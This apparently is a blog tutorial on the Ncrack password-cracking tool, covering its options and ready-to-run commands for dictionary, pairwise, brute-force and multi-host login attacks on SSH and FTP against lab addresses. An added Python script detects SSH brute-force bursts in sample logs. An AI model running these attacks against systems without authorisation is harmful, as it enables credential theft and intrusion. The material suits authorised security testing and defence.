ncrack
Ncrack is a password cracking tool
Ncrack is a password cracking tool, and one of the more powerful ones.
The tool was developed to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.
I and many other security professionals rely on the Ncrack tool.
The tool has only a command-line interface, which some will see as a disadvantage. Even so, it gets positive reviews year after year. It allows for rapid, yet reliable large-scale auditing of multiple hosts.
Features in Ncrack tool
Allowing for very sophisticated brute-forcing attacks
Timing templates for ease of use
Protocols supported include SSH, RDP, FTP, Telnet, HTTP(S), WordPress, POP3(S), IMAP, CVS, SMB, VNC, SIP, Redis, PostgreSQL, MQTT, MySQL, MSSQL, MongoDB, Cassandra, WinRM, OWA, and DICOM
Runtime interaction similar to Nmap
Useful commands in Ncrack
Target specification:
-iX: Input from Nmap's -oX XML output format
-iN: Input from Nmap's -oN Normal output format
-iL: Input from list of hosts/networks
--exclude: Exclude hosts/networks
--excludefile: Exclude list from file
Service specification:
-p: services will be applied to all non-standard notation hosts
-m: options will be applied to all services of this type
-g: options will be applied to every service globally
Authentication:
-U: username file
-P: password file
--user: comma-separated username list
--pass: comma-separated password list
--passwords-first: Iterate password list for each username. Default is the opposite.
--pairwise: Choose usernames and passwords in pairs.
Output:
-oN/-oX: Output scan in normal and XML format, respectively, to the given filename.
-oA: Output in the two major formats at once
-v: Increase verbosity level (use twice or more for greater effect)
Module:
SSH, RDP, FTP, Telnet, HTTP(S), WordPress, POP3(S), IMAP, CVS, SMB, VNC, SIP, Redis, PostgreSQL, MQTT, MySQL, MSSQL, MongoDB, Cassandra, WinRM, OWA, DICOM
How to use the Ncrack tool
Finally, let's get into the practical part. I am damn sure that by the end of the post you will be familiar with using the tool.
Just follow the examples and commands below and try them out. If you have any doubts, comment down below or watch the video I made on Ncrack.
#ncrack -h


Example 1, Default scan
To do a default scan, just enter the service you are attacking and then the target, like this:
ncrack ssh://10.10.1.3

Example 2, Using specific username & Password
Let's use a specific username and password to crack the target. For this we use the -user and -pass options.
ncrack ssh://10.10.1.3 -user msfadmin -pass msfadmin

Example 3, Dictionary attack
To do a dictionary attack, you need a file with a list of usernames and a file with a list of passwords.
ncrack ssh://10.10.1.3 -U /home/protector/Downloads/username.txt -P /home/protector/Downloads/userpass.txt
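
Seen from the target, a dictionary run like the one above shows up in the SSH log as a burst of failed logins from a single source. The Python script below is an added example, not part of the original post or of Ncrack; it flags such bursts and lists any account that was accepted from the same source. It assumes OpenSSH's standard "Failed password" / "Accepted password" syslog lines, and the sample log, host name, source addresses, window and threshold are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of OpenSSH syslog lines (not captured from a real host).
SAMPLE_LOG = """\
Jan  1 09:46:01 target sshd[2101]: Failed password for msfadmin from 10.10.1.9 port 40112 ssh2
Jan  1 09:46:02 target sshd[2102]: Failed password for invalid user rkadmin from 10.10.1.9 port 40114 ssh2
Jan  1 09:46:03 target sshd[2103]: Failed password for msfadmin from 10.10.1.9 port 40116 ssh2
Jan  1 09:46:05 target sshd[2104]: Failed password for invalid user rkadmin from 10.10.1.9 port 40118 ssh2
Jan  1 09:46:06 target sshd[2105]: Failed password for msfadmin from 10.10.1.9 port 40120 ssh2
Jan  1 09:46:08 target sshd[2106]: Failed password for invalid user rkadmin from 10.10.1.9 port 40122 ssh2
Jan  1 09:46:09 target sshd[2107]: Accepted password for msfadmin from 10.10.1.9 port 40124 ssh2
Jan  1 09:50:12 target sshd[2110]: Failed password for alice from 10.10.1.20 port 51300 ssh2
Jan  1 09:55:40 target sshd[2115]: Failed password for alice from 10.10.1.20 port 51302 ssh2
"""

# Syslog timestamps carry no year, so the caller supplies one (assumed 2024 here).
EVENT = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+")

def parse_events(text, year=2024):
    """Yield (timestamp, source_ip, username, accepted) per password event."""
    for line in text.splitlines():
        m = EVENT.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
            yield ts, m.group(4), m.group(3), m.group(2) == "Accepted"

def detect_guessing(text, window=timedelta(seconds=60), threshold=5):
    """Flag sources with at least `threshold` failures inside any sliding window."""
    by_src = defaultdict(list)
    for ts, src, user, ok in parse_events(text):
        by_src[src].append((ts, user, ok))
    alerts = {}
    for src, events in by_src.items():
        events.sort()
        fails = [(ts, u) for ts, u, ok in events if not ok]
        start = best = 0
        for end, (ts, _) in enumerate(fails):
            while ts - fails[start][0] > window:  # drop failures older than the window
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            # "accepted" = accounts that logged in from the flagged source: rotate first.
            alerts[src] = {"burst": best, "users": sorted({u for _, u in fails}),
                           "accepted": sorted({u for _, u, ok in events if ok})}
    return alerts
```

Calling detect_guessing(SAMPLE_LOG) flags only 10.10.1.9; the two mistyped logins from 10.10.1.20, minutes apart, stay below the threshold.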


Example 4, Pairwise attack
Suppose you don't know the username and password, and you don't want to build dictionary files yourself. In that case you can leave it to Ncrack.
Ncrack supplies the usernames and passwords itself and reports any login that succeeds. All you have to do is sit back and wait.
ncrack -v --pairwise 10.10.1.3:21

Example 5, Brute forcing
If you have a custom list of usernames and passwords, you can brute-force with them by entering this command:
ncrack -user msfadmin,rkadmin -pass msfadmin,123 ftp://10.10.1.3

Example 6, Resume an attack
To resume an attack, use the --resume option and give it the previous restore file, like this:
ncrack --resume /root/.ncrack/restore.2024-01-01_09-46


Example 7, Timing
Ncrack's timing templates are very similar to Nmap's.
T5: Insane Scan
T4: Aggressive Scan
T3: Normal Scan
T2: Polite Scan
T1: Sneaky Scan
ncrack -user msfadmin,rkadmin -pass msfadmin,123 ftp://10.10.1.3 -T4

I have created a small username and password file to save time.
sudo ncrack -U /home/protector/Downloads/username\ (copy).txt -P /home/protector/Downloads/userpass\ (another\ copy).txt ftp://10.10.1.3 -T4

Example 8, Multiple host attack
To attack multiple hosts, put the list of targets in a file and pass that file in the command:
ncrack -U /home/protector/Downloads/username\ (copy).txt -P /home/protector/Downloads/userpass\ (another\ copy).txt -iL /home/protector/Downloads/host1.txt -p21 -v
-iL: Specify the target host file
-p21: to mention the port to attack

Example 9, Output
To save the output to a specific location:
ncrack -U /home/protector/Downloads/username\ (copy).txt -P /home/protector/Downloads/userpass\ (another\ copy).txt 10.10.1.3:21 -oN normal.txt
or
ncrack -U /home/protector/Downloads/username\ (copy).txt -P /home/protector/Downloads/userpass\ (another\ copy).txt 10.10.1.3:21 > normal.txt
ncrack -U /home/protector/Downloads/username\ (copy).txt -P /home/protector/Downloads/userpass\ (another\ copy).txt 10.10.1.3 -oX save.xml
cat normal.txt
